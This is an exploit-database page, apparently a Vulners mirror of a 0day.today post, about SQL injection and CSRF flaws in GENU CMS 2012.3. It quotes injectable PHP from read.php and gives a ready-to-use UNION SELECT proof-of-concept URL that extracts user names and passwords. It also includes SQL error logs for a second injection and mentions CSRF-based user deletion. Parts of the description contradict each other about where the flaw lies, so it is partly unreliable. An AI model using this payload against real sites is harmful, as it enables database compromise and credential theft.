Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

GENU CMS SQL Injection Vulnerability

🗓️ 05 Apr 2012 00:00:00Reported by h0rdType 
zdt
 zdt🔗 0day.today👁 16 Views

Remote SQL Injection in GENU CMS 2012-

Code
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GENU CMS SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 
bug found by h0rd h0rd[at]null.net
homepage http://h0rd.net
download http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
vulnerability in read.php
vuln code:
[...]
include('./../includes/common.php');
 
page_header($lang['ARTICLES_READ_TITLE']);
 
if (isset($_GET['article_id']))
{
    $sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
                 FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
                 WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
                 AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']);
    $table_articles = $sql->fetch();
[...]
 
PoC exploit:
http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--

A remote SQL Injection vulnerability is detected in GENU CMS 2012-3 content management system.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands 
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the username post method.

Vulnerable Module(s):
				[+] Search - news_subject

--- SQL Exception Logs ---
Error in query  SELECT genu_categories.category_id, genu_categories.category_image, 
genu_categories.category_name, genu_news.news_comments, genu_news.news_date, 
genu_news.news_id, genu_news.news_source, genu_news.news_subject, genu_news.news_text, 
genu_users.user_id, genu_users.user_name FROM genu_categories, genu_news, genu_users WHERE 
genu_categories.category_id = genu_news.category_id AND genu_categories.category_level IN 
( 0 ,  2 ) AND genu_news.news_active =  1  AND genu_news.user_id = genu_users.user_id AND 
LOWER(genu_news.news_subject-1 ) LIKE  %news%  ORDER BY news_date DESC LIMIT 0, 30 

A csrf vulnerability is detected in GENU CMS 2012-3 content management system. The vulnerability allows
an remote attacker to delete with medium required user inter action administrator, moderator & users without 
checkbox or confirmation by the admin itself.

Vulnerable Module(s):
				[+] Delete User



#  0day.today [2018-03-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Apr 2012 00:00Current
7.1High risk
Vulners AI Score7.1
genu cmssql injectionremotevulnerabilityexploitcontent management systemcsrfdelete user
16